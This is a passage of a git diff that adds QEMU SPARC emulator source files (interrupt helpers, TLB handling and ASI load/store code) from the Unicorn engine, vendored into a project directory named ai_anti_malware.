+DEF_HELPER_FLAGS_2(fmul8ulx16, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmuld8sux16, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fmuld8ulx16, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(fexpand, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_3(pdist, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) +DEF_HELPER_FLAGS_2(fpack16, TCG_CALL_NO_RWG_SE, i32, i64, i64) +DEF_HELPER_FLAGS_3(fpack32, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) +DEF_HELPER_FLAGS_2(fpackfix, TCG_CALL_NO_RWG_SE, i32, i64, i64) +DEF_HELPER_FLAGS_3(bshuffle, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) +#define VIS_HELPER(name) \ + DEF_HELPER_FLAGS_2(f ## name ## 16, TCG_CALL_NO_RWG_SE, \ + i64, i64, i64) \ + DEF_HELPER_FLAGS_2(f ## name ## 16s, TCG_CALL_NO_RWG_SE, \ + i32, i32, i32) \ + DEF_HELPER_FLAGS_2(f ## name ## 32, TCG_CALL_NO_RWG_SE, \ + i64, i64, i64) \ + DEF_HELPER_FLAGS_2(f ## name ## 32s, TCG_CALL_NO_RWG_SE, \ + i32, i32, i32) + +VIS_HELPER(padd) +VIS_HELPER(psub) +#define VIS_CMPHELPER(name) \ + DEF_HELPER_FLAGS_2(f##name##16, TCG_CALL_NO_RWG_SE, \ + i64, i64, i64) \ + DEF_HELPER_FLAGS_2(f##name##32, TCG_CALL_NO_RWG_SE, \ + i64, i64, i64) +VIS_CMPHELPER(cmpgt) +VIS_CMPHELPER(cmpeq) +VIS_CMPHELPER(cmple) +VIS_CMPHELPER(cmpne) +#endif +#undef F_HELPER_0_1 +#undef VIS_HELPER +#undef VIS_CMPHELPER +DEF_HELPER_1(compute_psr, void, env) +DEF_HELPER_1(compute_C_icc, i32, env) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int32_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int32_helper.c new file mode 100644 index 0000000..4a34a71 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int32_helper.c @@ -0,0 +1,95 @@ +/* + * Sparc32 interrupt helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * 
version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "sysemu/sysemu.h" + + +void sparc_cpu_do_interrupt(CPUState *cs) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + int cwp, intno = cs->exception_index; + + /* Compute PSR before exposing state. */ + if (env->cc_op != CC_OP_FLAGS) { + cpu_get_psr(env); + } + +#if !defined(CONFIG_USER_ONLY) + if (env->psret == 0) { + if (cs->exception_index == 0x80 && + env->def->features & CPU_FEATURE_TA0_SHUTDOWN) { + qemu_system_shutdown_request(); + } else { + cpu_abort(cs, "Trap 0x%02x while interrupts disabled, Error state", + cs->exception_index); + } + return; + } +#endif + env->psret = 0; + cwp = cpu_cwp_dec(env, env->cwp - 1); + cpu_set_cwp(env, cwp); + env->regwptr[9] = env->pc; + env->regwptr[10] = env->npc; + env->psrps = env->psrs; + env->psrs = 1; + env->tbr = (env->tbr & TBR_BASE_MASK) | (intno << 4); + env->pc = env->tbr; + env->npc = env->pc + 4; + cs->exception_index = -1; +} + +#if !defined(CONFIG_USER_ONLY) +static void leon3_cache_control_int(CPUSPARCState *env) +{ + uint32_t state = 0; + + if (env->cache_control & CACHE_CTRL_IF) { + /* Instruction cache state */ + state = env->cache_control & CACHE_STATE_MASK; + if (state == CACHE_ENABLED) { + state = CACHE_FROZEN; + //trace_int_helper_icache_freeze(); + } + + env->cache_control &= ~CACHE_STATE_MASK; + env->cache_control |= state; + } + + if (env->cache_control & CACHE_CTRL_DF) { + /* Data cache state */ + state = (env->cache_control >> 2) & CACHE_STATE_MASK; + if (state == CACHE_ENABLED) { + state = 
CACHE_FROZEN; + //trace_int_helper_dcache_freeze(); + } + + env->cache_control &= ~(CACHE_STATE_MASK << 2); + env->cache_control |= (state << 2); + } +} + +void leon3_irq_manager(CPUSPARCState *env, void *irq_manager, int intno) +{ + //leon3_irq_ack(irq_manager, intno); + leon3_cache_control_int(env); +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int64_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int64_helper.c new file mode 100644 index 0000000..7eba49c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/int64_helper.c @@ -0,0 +1,128 @@ +/* + * Sparc64 interrupt helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + + +void sparc_cpu_do_interrupt(CPUState *cs) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + int intno = cs->exception_index; + trap_state *tsptr; + + /* Compute PSR before exposing state. 
*/ + if (env->cc_op != CC_OP_FLAGS) { + cpu_get_psr(env); + } + +#if !defined(CONFIG_USER_ONLY) + if (env->tl >= env->maxtl) { + cpu_abort(cs, "Trap 0x%04x while trap level (%d) >= MAXTL (%d)," + " Error state", cs->exception_index, env->tl, env->maxtl); + return; + } +#endif + if (env->tl < env->maxtl - 1) { + env->tl++; + } else { + env->pstate |= PS_RED; + if (env->tl < env->maxtl) { + env->tl++; + } + } + tsptr = cpu_tsptr(env); + + tsptr->tstate = (cpu_get_ccr(env) << 32) | + ((env->asi & 0xff) << 24) | ((env->pstate & 0xf3f) << 8) | + cpu_get_cwp64(env); + tsptr->tpc = env->pc; + tsptr->tnpc = env->npc; + tsptr->tt = intno; + + switch (intno) { + case TT_IVEC: + cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_IG); + break; + case TT_TFAULT: + case TT_DFAULT: + case TT_TMISS: case TT_TMISS+1: case TT_TMISS+2: case TT_TMISS+3: + case TT_DMISS: case TT_DMISS+1: case TT_DMISS+2: case TT_DMISS+3: + case TT_DPROT: case TT_DPROT+1: case TT_DPROT+2: case TT_DPROT+3: + cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_MG); + break; + default: + cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_AG); + break; + } + + if (intno == TT_CLRWIN) { + cpu_set_cwp(env, cpu_cwp_dec(env, env->cwp - 1)); + } else if ((intno & 0x1c0) == TT_SPILL) { + cpu_set_cwp(env, cpu_cwp_dec(env, env->cwp - env->cansave - 2)); + } else if ((intno & 0x1c0) == TT_FILL) { + cpu_set_cwp(env, cpu_cwp_inc(env, env->cwp + 1)); + } + env->tbr &= ~0x7fffULL; + env->tbr |= ((env->tl > 1) ? 
1 << 14 : 0) | (intno << 5); + env->pc = env->tbr; + env->npc = env->pc + 4; + cs->exception_index = -1; +} + +trap_state *cpu_tsptr(CPUSPARCState* env) +{ + return &env->ts[env->tl & MAXTL_MASK]; +} + +static bool do_modify_softint(CPUSPARCState *env, uint32_t value) +{ + if (env->softint != value) { + env->softint = value; +#if !defined(CONFIG_USER_ONLY) + if (cpu_interrupts_enabled(env)) { + //cpu_check_irqs(env); + } +#endif + return true; + } + return false; +} + +void helper_set_softint(CPUSPARCState *env, uint64_t value) +{ + if (do_modify_softint(env, env->softint | (uint32_t)value)) { + //trace_int_helper_set_softint(env->softint); + } +} + +void helper_clear_softint(CPUSPARCState *env, uint64_t value) +{ + if (do_modify_softint(env, env->softint & (uint32_t)~value)) { + //trace_int_helper_clear_softint(env->softint); + } +} + +void helper_write_softint(CPUSPARCState *env, uint64_t value) +{ + if (do_modify_softint(env, (uint32_t)value)) { + //trace_int_helper_write_softint(env->softint); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/ldst_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/ldst_helper.c new file mode 100644 index 0000000..94f75d0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/ldst_helper.c @@ -0,0 +1,2460 @@ +/* + * Helpers for loads and stores + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
+ * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +//#define DEBUG_MMU +//#define DEBUG_MXCC +//#define DEBUG_UNALIGNED +//#define DEBUG_UNASSIGNED +//#define DEBUG_ASI +//#define DEBUG_CACHE_CONTROL + +#ifdef DEBUG_MMU +#define DPRINTF_MMU(fmt, ...) \ + do { printf("MMU: " fmt , ## __VA_ARGS__); } while (0) +#else +#define DPRINTF_MMU(fmt, ...) do {} while (0) +#endif + +#ifdef DEBUG_MXCC +#define DPRINTF_MXCC(fmt, ...) \ + do { printf("MXCC: " fmt , ## __VA_ARGS__); } while (0) +#else +#define DPRINTF_MXCC(fmt, ...) do {} while (0) +#endif + +#ifdef DEBUG_ASI +#define DPRINTF_ASI(fmt, ...) \ + do { printf("ASI: " fmt , ## __VA_ARGS__); } while (0) +#endif + +#ifdef DEBUG_CACHE_CONTROL +#define DPRINTF_CACHE_CONTROL(fmt, ...) \ + do { printf("CACHE_CONTROL: " fmt , ## __VA_ARGS__); } while (0) +#else +#define DPRINTF_CACHE_CONTROL(fmt, ...) do {} while (0) +#endif + +#ifdef TARGET_SPARC64 +#ifndef TARGET_ABI32 +#define AM_CHECK(env1) ((env1)->pstate & PS_AM) +#else +#define AM_CHECK(env1) (1) +#endif +#endif + +#define QT0 (env->qt0) +#define QT1 (env->qt1) + +#if defined(TARGET_SPARC64) && !defined(CONFIG_USER_ONLY) +/* Calculates TSB pointer value for fault page size 8k or 64k */ +static uint64_t ultrasparc_tsb_pointer(uint64_t tsb_register, + uint64_t tag_access_register, + int page_size) +{ + uint64_t tsb_base = tsb_register & ~0x1fffULL; + int tsb_split = (tsb_register & 0x1000ULL) ? 
1 : 0; + int tsb_size = tsb_register & 0xf; + + /* discard lower 13 bits which hold tag access context */ + uint64_t tag_access_va = tag_access_register & ~0x1fffULL; + + /* now reorder bits */ + uint64_t tsb_base_mask = ~0x1fffULL; + uint64_t va = tag_access_va; + + /* move va bits to correct position */ + if (page_size == 8*1024) { + va >>= 9; + } else if (page_size == 64*1024) { + va >>= 12; + } + + if (tsb_size) { + tsb_base_mask <<= tsb_size; + } + + /* calculate tsb_base mask and adjust va if split is in use */ + if (tsb_split) { + if (page_size == 8*1024) { + va &= ~(1ULL << (13 + tsb_size)); + } else if (page_size == 64*1024) { + va |= (1ULL << (13 + tsb_size)); + } + tsb_base_mask <<= 1; + } + + return ((tsb_base & tsb_base_mask) | (va & ~tsb_base_mask)) & ~0xfULL; +} + +/* Calculates tag target register value by reordering bits + in tag access register */ +static uint64_t ultrasparc_tag_target(uint64_t tag_access_register) +{ + return ((tag_access_register & 0x1fff) << 48) | (tag_access_register >> 22); +} + +static void replace_tlb_entry(SparcTLBEntry *tlb, + uint64_t tlb_tag, uint64_t tlb_tte, + CPUSPARCState *env1) +{ + target_ulong mask, size, va, offset; + + /* flush page range if translation is valid */ + if (TTE_IS_VALID(tlb->tte)) { + CPUState *cs = CPU(sparc_env_get_cpu(env1)); + + mask = 0xffffffffffffe000ULL; + mask <<= 3 * ((tlb->tte >> 61) & 3); + size = ~mask + 1; + + va = tlb->tag & mask; + + for (offset = 0; offset < size; offset += TARGET_PAGE_SIZE) { + tlb_flush_page(cs, va + offset); + } + } + + tlb->tag = tlb_tag; + tlb->tte = tlb_tte; +} + +static void demap_tlb(SparcTLBEntry *tlb, target_ulong demap_addr, + const char *strmmu, CPUSPARCState *env1) +{ + unsigned int i; + target_ulong mask; + uint64_t context; + + int is_demap_context = (demap_addr >> 6) & 1; + + /* demap context */ + switch ((demap_addr >> 4) & 3) { + case 0: /* primary */ + context = env1->dmmu.mmu_primary_context; + break; + case 1: /* secondary */ + context = 
env1->dmmu.mmu_secondary_context; + break; + case 2: /* nucleus */ + context = 0; + break; + case 3: /* reserved */ + default: + return; + } + + for (i = 0; i < 64; i++) { + if (TTE_IS_VALID(tlb[i].tte)) { + + if (is_demap_context) { + /* will remove non-global entries matching context value */ + if (TTE_IS_GLOBAL(tlb[i].tte) || + !tlb_compare_context(&tlb[i], context)) { + continue; + } + } else { + /* demap page + will remove any entry matching VA */ + mask = 0xffffffffffffe000ULL; + mask <<= 3 * ((tlb[i].tte >> 61) & 3); + + if (!compare_masked(demap_addr, tlb[i].tag, mask)) { + continue; + } + + /* entry should be global or matching context value */ + if (!TTE_IS_GLOBAL(tlb[i].tte) && + !tlb_compare_context(&tlb[i], context)) { + continue; + } + } + + replace_tlb_entry(&tlb[i], 0, 0, env1); +#ifdef DEBUG_MMU + DPRINTF_MMU("%s demap invalidated entry [%02u]\n", strmmu, i); + dump_mmu(stdout, fprintf, env1); +#endif + } + } +} + +static void replace_tlb_1bit_lru(SparcTLBEntry *tlb, + uint64_t tlb_tag, uint64_t tlb_tte, + const char *strmmu, CPUSPARCState *env1) +{ + unsigned int i, replace_used; + + /* Try replacing invalid entry */ + for (i = 0; i < 64; i++) { + if (!TTE_IS_VALID(tlb[i].tte)) { + replace_tlb_entry(&tlb[i], tlb_tag, tlb_tte, env1); +#ifdef DEBUG_MMU + DPRINTF_MMU("%s lru replaced invalid entry [%i]\n", strmmu, i); + dump_mmu(stdout, fprintf, env1); +#endif + return; + } + } + + /* All entries are valid, try replacing unlocked entry */ + + for (replace_used = 0; replace_used < 2; ++replace_used) { + + /* Used entries are not replaced on first pass */ + + for (i = 0; i < 64; i++) { + if (!TTE_IS_LOCKED(tlb[i].tte) && !TTE_IS_USED(tlb[i].tte)) { + + replace_tlb_entry(&tlb[i], tlb_tag, tlb_tte, env1); +#ifdef DEBUG_MMU + DPRINTF_MMU("%s lru replaced unlocked %s entry [%i]\n", + strmmu, (replace_used ? 
"used" : "unused"), i); + dump_mmu(stdout, fprintf, env1); +#endif + return; + } + } + + /* Now reset used bit and search for unused entries again */ + + for (i = 0; i < 64; i++) { + TTE_SET_UNUSED(tlb[i].tte); + } + } + +#ifdef DEBUG_MMU + DPRINTF_MMU("%s lru replacement failed: no entries available\n", strmmu); +#endif + /* error state? */ +} + +#endif + +void helper_check_align(CPUSPARCState *env, target_ulong addr, uint32_t align) +{ + if (addr & align) { +#ifdef DEBUG_UNALIGNED + printf("Unaligned access to 0x" TARGET_FMT_lx " from 0x" TARGET_FMT_lx + "\n", addr, env->pc); +#endif + helper_raise_exception(env, TT_UNALIGNED); + } +} + +#if !defined(TARGET_SPARC64) && !defined(CONFIG_USER_ONLY) && \ + defined(DEBUG_MXCC) +static void dump_mxcc(CPUSPARCState *env) +{ + printf("mxccdata: %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 + "\n", + env->mxccdata[0], env->mxccdata[1], + env->mxccdata[2], env->mxccdata[3]); + printf("mxccregs: %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 + "\n" + " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 + "\n", + env->mxccregs[0], env->mxccregs[1], + env->mxccregs[2], env->mxccregs[3], + env->mxccregs[4], env->mxccregs[5], + env->mxccregs[6], env->mxccregs[7]); +} +#endif + +#if (defined(TARGET_SPARC64) || !defined(CONFIG_USER_ONLY)) \ + && defined(DEBUG_ASI) +static void dump_asi(const char *txt, target_ulong addr, int asi, int size, + uint64_t r1) +{ + switch (size) { + case 1: + DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %02" PRIx64 "\n", txt, + addr, asi, r1 & 0xff); + break; + case 2: + DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %04" PRIx64 "\n", txt, + addr, asi, r1 & 0xffff); + break; + case 4: + DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %08" PRIx64 "\n", txt, + addr, asi, r1 & 0xffffffff); + break; + case 8: + DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %016" PRIx64 "\n", txt, + addr, asi, r1); + break; + } +} +#endif + +#ifndef TARGET_SPARC64 +#ifndef CONFIG_USER_ONLY + + 
+/* Leon3 cache control */ + +static void leon3_cache_control_st(CPUSPARCState *env, target_ulong addr, + uint64_t val, int size) +{ + DPRINTF_CACHE_CONTROL("st addr:%08x, val:%" PRIx64 ", size:%d\n", + addr, val, size); + + if (size != 4) { + DPRINTF_CACHE_CONTROL("32bits only\n"); + return; + } + + switch (addr) { + case 0x00: /* Cache control */ + + /* These values must always be read as zeros */ + val &= ~CACHE_CTRL_FD; + val &= ~CACHE_CTRL_FI; + val &= ~CACHE_CTRL_IB; + val &= ~CACHE_CTRL_IP; + val &= ~CACHE_CTRL_DP; + + env->cache_control = val; + break; + case 0x04: /* Instruction cache configuration */ + case 0x08: /* Data cache configuration */ + /* Read Only */ + break; + default: + DPRINTF_CACHE_CONTROL("write unknown register %08x\n", addr); + break; + }; +} + +static uint64_t leon3_cache_control_ld(CPUSPARCState *env, target_ulong addr, + int size) +{ + uint64_t ret = 0; + + if (size != 4) { + DPRINTF_CACHE_CONTROL("32bits only\n"); + return 0; + } + + switch (addr) { + case 0x00: /* Cache control */ + ret = env->cache_control; + break; + + /* Configuration registers are read and only always keep those + predefined values */ + + case 0x04: /* Instruction cache configuration */ + ret = 0x10220000; + break; + case 0x08: /* Data cache configuration */ + ret = 0x18220000; + break; + default: + DPRINTF_CACHE_CONTROL("read unknown register %08x\n", addr); + break; + }; + DPRINTF_CACHE_CONTROL("ld addr:%08x, ret:0x%" PRIx64 ", size:%d\n", + addr, ret, size); + return ret; +} + +uint64_t helper_ld_asi(CPUSPARCState *env, target_ulong addr, int asi, int size, + int sign) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + uint64_t ret = 0; +#if defined(DEBUG_MXCC) || defined(DEBUG_ASI) + uint32_t last_addr = addr; +#endif + + helper_check_align(env, addr, size - 1); + switch (asi) { + case 2: /* SuperSparc MXCC registers and Leon3 cache control */ + switch (addr) { + case 0x00: /* Leon3 Cache Control */ + case 0x08: /* Leon3 Instruction Cache config */ + case 
0x0C: /* Leon3 Date Cache config */ + if (env->def->features & CPU_FEATURE_CACHE_CTRL) { + ret = leon3_cache_control_ld(env, addr, size); + } + break; + case 0x01c00a00: /* MXCC control register */ + if (size == 8) { + ret = env->mxccregs[3]; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00a04: /* MXCC control register */ + if (size == 4) { + ret = env->mxccregs[3]; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00c00: /* Module reset register */ + if (size == 8) { + ret = env->mxccregs[5]; + /* should we do something here? */ + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00f00: /* MBus port address register */ + if (size == 8) { + ret = env->mxccregs[7]; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + default: + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented address, size: %d\n", addr, + size); + break; + } + DPRINTF_MXCC("asi = %d, size = %d, sign = %d, " + "addr = %08x -> ret = %" PRIx64 "," + "addr = %08x\n", asi, size, sign, last_addr, ret, addr); +#ifdef DEBUG_MXCC + dump_mxcc(env); +#endif + break; + case 3: /* MMU probe */ + case 0x18: /* LEON3 MMU probe */ + { + int mmulev; + + mmulev = (addr >> 8) & 15; + if (mmulev > 4) { + ret = 0; + } else { + ret = mmu_probe(env, addr, mmulev); + } + DPRINTF_MMU("mmu_probe: 0x%08x (lev %d) -> 0x%08" PRIx64 "\n", + addr, mmulev, ret); + } + break; + case 4: /* read MMU regs */ + case 0x19: /* LEON3 read MMU regs */ + { + int reg = (addr >> 8) & 0x1f; + + ret = env->mmuregs[reg]; + if (reg == 3) { /* Fault status cleared on read */ + env->mmuregs[3] = 0; + } else if (reg == 0x13) { /* Fault status read */ + ret = env->mmuregs[3]; + } else if (reg == 0x14) { /* Fault address read */ + ret = env->mmuregs[4]; + } + DPRINTF_MMU("mmu_read: 
reg[%d] = 0x%08" PRIx64 "\n", reg, ret); + } + break; + case 5: /* Turbosparc ITLB Diagnostic */ + case 6: /* Turbosparc DTLB Diagnostic */ + case 7: /* Turbosparc IOTLB Diagnostic */ + break; + case 9: /* Supervisor code access */ + switch (size) { + case 1: + ret = cpu_ldub_code(env, addr); + break; + case 2: + ret = cpu_lduw_code(env, addr); + break; + default: + case 4: + ret = cpu_ldl_code(env, addr); + break; + case 8: + ret = cpu_ldq_code(env, addr); + break; + } + break; + case 0xa: /* User data access */ + switch (size) { + case 1: + ret = cpu_ldub_user(env, addr); + break; + case 2: + ret = cpu_lduw_user(env, addr); + break; + default: + case 4: + ret = cpu_ldl_user(env, addr); + break; + case 8: + ret = cpu_ldq_user(env, addr); + break; + } + break; + case 0xb: /* Supervisor data access */ + case 0x80: + switch (size) { + case 1: + ret = cpu_ldub_kernel(env, addr); + break; + case 2: + ret = cpu_lduw_kernel(env, addr); + break; + default: + case 4: + ret = cpu_ldl_kernel(env, addr); + break; + case 8: + ret = cpu_ldq_kernel(env, addr); + break; + } + break; + case 0xc: /* I-cache tag */ + case 0xd: /* I-cache data */ + case 0xe: /* D-cache tag */ + case 0xf: /* D-cache data */ + break; + case 0x20: /* MMU passthrough */ + case 0x1c: /* LEON MMU passthrough */ + switch (size) { + case 1: + ret = ldub_phys(cs->as, addr); + break; + case 2: + ret = lduw_phys(cs->as, addr); + break; + default: + case 4: + ret = ldl_phys(cs->as, addr); + break; + case 8: + ret = ldq_phys(cs->as, addr); + break; + } + break; + /* MMU passthrough, 0x100000000 to 0xfffffffff */ + case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: case 0x26: case 0x27: + case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: case 0x2e: case 0x2f: + switch (size) { + case 1: + ret = ldub_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32)); + break; + case 2: + ret = lduw_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32)); + break; + default: + case 4: + ret = 
ldl_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32)); + break; + case 8: + ret = ldq_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32)); + break; + } + break; + case 0x30: /* Turbosparc secondary cache diagnostic */ + case 0x31: /* Turbosparc RAM snoop */ + case 0x32: /* Turbosparc page table descriptor diagnostic */ + case 0x39: /* data cache diagnostic register */ + ret = 0; + break; + case 0x38: /* SuperSPARC MMU Breakpoint Control Registers */ + { + int reg = (addr >> 8) & 3; + + switch (reg) { + case 0: /* Breakpoint Value (Addr) */ + ret = env->mmubpregs[reg]; + break; + case 1: /* Breakpoint Mask */ + ret = env->mmubpregs[reg]; + break; + case 2: /* Breakpoint Control */ + ret = env->mmubpregs[reg]; + break; + case 3: /* Breakpoint Status */ + ret = env->mmubpregs[reg]; + env->mmubpregs[reg] = 0ULL; + break; + } + DPRINTF_MMU("read breakpoint reg[%d] 0x%016" PRIx64 "\n", reg, + ret); + } + break; + case 0x49: /* SuperSPARC MMU Counter Breakpoint Value */ + ret = env->mmubpctrv; + break; + case 0x4a: /* SuperSPARC MMU Counter Breakpoint Control */ + ret = env->mmubpctrc; + break; + case 0x4b: /* SuperSPARC MMU Counter Breakpoint Status */ + ret = env->mmubpctrs; + break; + case 0x4c: /* SuperSPARC MMU Breakpoint Action */ + ret = env->mmubpaction; + break; + case 8: /* User code access, XXX */ + default: + cpu_unassigned_access(cs, addr, false, false, asi, size); + ret = 0; + break; + } + if (sign) { + switch (size) { + case 1: + ret = (int8_t) ret; + break; + case 2: + ret = (int16_t) ret; + break; + case 4: + ret = (int32_t) ret; + break; + default: + break; + } + } +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + return ret; +} + +void helper_st_asi(CPUSPARCState *env, target_ulong addr, uint64_t val, int asi, + int size) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + CPUState *cs = CPU(cpu); + + helper_check_align(env, addr, size - 1); + switch (asi) { + case 2: /* SuperSparc MXCC registers and Leon3 cache 
control */ + switch (addr) { + case 0x00: /* Leon3 Cache Control */ + case 0x08: /* Leon3 Instruction Cache config */ + case 0x0C: /* Leon3 Date Cache config */ + if (env->def->features & CPU_FEATURE_CACHE_CTRL) { + leon3_cache_control_st(env, addr, val, size); + } + break; + + case 0x01c00000: /* MXCC stream data register 0 */ + if (size == 8) { + env->mxccdata[0] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00008: /* MXCC stream data register 1 */ + if (size == 8) { + env->mxccdata[1] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00010: /* MXCC stream data register 2 */ + if (size == 8) { + env->mxccdata[2] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00018: /* MXCC stream data register 3 */ + if (size == 8) { + env->mxccdata[3] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00100: /* MXCC stream source */ + if (size == 8) { + env->mxccregs[0] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + env->mxccdata[0] = ldq_phys(cs->as, + (env->mxccregs[0] & 0xffffffffULL) + + 0); + env->mxccdata[1] = ldq_phys(cs->as, + (env->mxccregs[0] & 0xffffffffULL) + + 8); + env->mxccdata[2] = ldq_phys(cs->as, + (env->mxccregs[0] & 0xffffffffULL) + + 16); + env->mxccdata[3] = ldq_phys(cs->as, + (env->mxccregs[0] & 0xffffffffULL) + + 24); + break; + case 0x01c00200: /* MXCC stream destination */ + if (size == 8) { + env->mxccregs[1] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + stq_phys(cs->as, (env->mxccregs[1] & 0xffffffffULL) + 0, + env->mxccdata[0]); + stq_phys(cs->as, (env->mxccregs[1] & 0xffffffffULL) + 8, + env->mxccdata[1]); + 
stq_phys(cs->as, (env->mxccregs[1] & 0xffffffffULL) + 16, + env->mxccdata[2]); + stq_phys(cs->as, (env->mxccregs[1] & 0xffffffffULL) + 24, + env->mxccdata[3]); + break; + case 0x01c00a00: /* MXCC control register */ + if (size == 8) { + env->mxccregs[3] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00a04: /* MXCC control register */ + if (size == 4) { + env->mxccregs[3] = (env->mxccregs[3] & 0xffffffff00000000ULL) + | val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00e00: /* MXCC error register */ + /* writing a 1 bit clears the error */ + if (size == 8) { + env->mxccregs[6] &= ~val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + case 0x01c00f00: /* MBus port address register */ + if (size == 8) { + env->mxccregs[7] = val; + } else { + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented access size: %d\n", addr, + size); + } + break; + default: + qemu_log_mask(LOG_UNIMP, + "%08x: unimplemented address, size: %d\n", addr, + size); + break; + } + DPRINTF_MXCC("asi = %d, size = %d, addr = %08x, val = %" PRIx64 "\n", + asi, size, addr, val); +#ifdef DEBUG_MXCC + dump_mxcc(env); +#endif + break; + case 3: /* MMU flush */ + case 0x18: /* LEON3 MMU flush */ + { + int mmulev; + + mmulev = (addr >> 8) & 15; + DPRINTF_MMU("mmu flush level %d\n", mmulev); + switch (mmulev) { + case 0: /* flush page */ + tlb_flush_page(CPU(cpu), addr & 0xfffff000); + break; + case 1: /* flush segment (256k) */ + case 2: /* flush region (16M) */ + case 3: /* flush context (4G) */ + case 4: /* flush entire */ + tlb_flush(CPU(cpu), 1); + break; + default: + break; + } +#ifdef DEBUG_MMU + dump_mmu(stdout, fprintf, env); +#endif + } + break; + case 4: /* 